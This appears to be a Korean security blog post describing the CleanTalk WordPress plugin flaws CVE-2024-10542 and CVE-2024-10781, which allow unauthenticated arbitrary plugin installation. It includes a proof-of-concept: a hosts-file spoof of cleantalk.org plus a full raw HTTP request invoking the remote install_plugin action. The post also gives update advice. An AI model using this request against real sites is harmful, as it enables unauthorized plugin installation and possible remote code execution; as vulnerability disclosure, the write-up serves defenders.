
WordPress Spam protection, AntiSpam, FireWall by CleanTalk 플러그인 <= 6.43.2는 인증되지 않은 임의 플러그인 설치(Unauthenticated Arbitrary Plugin Installation) 취약점에 노출되어 있습니다.
본 문서에서 CVE-2024-10542와 관련하여 제공되는 정보는 학습 및 교육 목적으로만 제공됩니다. 우리는 이 정보를 악용, 시스템 변조, 기타 불법 활동을 포함하되 이에 국한되지 않는 유해한 목적으로 사용하는 것을 권장하거나 승인하지 않습니다.
점점 더 복잡해지는 디지털 환경에서 웹사이트의 보안을 보장하는 것은 많은 사이트 소유자에게 가장 중요한 일입니다. 최근 WordPress 사이트에 심각한 위협이 되는 두 가지 치명적인 취약점이 발견되었습니다. 이 취약점들은 스팸 보호, 안티스팸 및 방화벽 기능을 제공하는 잘 알려진 CleanTalk 플러그인에 영향을 미칩니다. 무엇이 이 상황을 더욱 긴급하게 만들까요? 더 자세히 살펴보겠습니다! CVE-2024-10542 및 CVE-2024-10781로 추적되는 두 가지 취약점은 인증되지 않은 공격자가 취약한 사이트에 악성 플러그인을 설치하고 활성화할 수 있게 합니다. 이는 사이트의 평판을 손상시킬 뿐만 아니라 공격자가 원격 코드를 실행할 수 있는 길을 열어줍니다. CVSS 점수가 10점 만점에 9.8점이라는 점에서 이 취약점들이 매우 위험한 범주에 속한다는 것은 명백합니다. Wordfence에 따르면 두 취약점 모두 악의적인 행위자가 임의의 플러그인을 설치하고 활성화할 수 있게 하는 인가 우회 문제와 관련되어 있습니다. 이후 활성화된 플러그인 자체에 취약점이 있는 경우 원격 코드 실행으로 이어질 수 있습니다.
먼저 악의적인 사용자는 운영 체제의 hosts 파일을 다음과 같이 설정합니다:
127.0.0.1 cleantalk.org
그런 다음 다음과 같은 요청을 전송합니다
POST /?plugin=wp-hooks-finder/index.php HTTP/1.1
Host: wordpress.test
Content-Length: 56
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
spbc_remote_call_action=install_plugin&plugin_name=apbct
사이버 보안은 모든 사이트 소유자가 함께 져야 할 책임입니다. 플러그인을 최신 상태로 유지하고 잠재적인 취약점에 대해 경계를 늦추지 않음으로써 악의적인 공격으로부터 사이트를 보호할 수 있습니다. CleanTalk를 최신 버전으로 업데이트하고 다른 플러그인도 정기적으로 점검하여 최대한의 보안을 보장하십시오. 작은 조치가 큰 재앙을 예방할 수 있다는 것을 기억하세요!
Allah, Muhammad SAW, mikemyers, Markdown Monster, 제 가족, 그리고 여러분?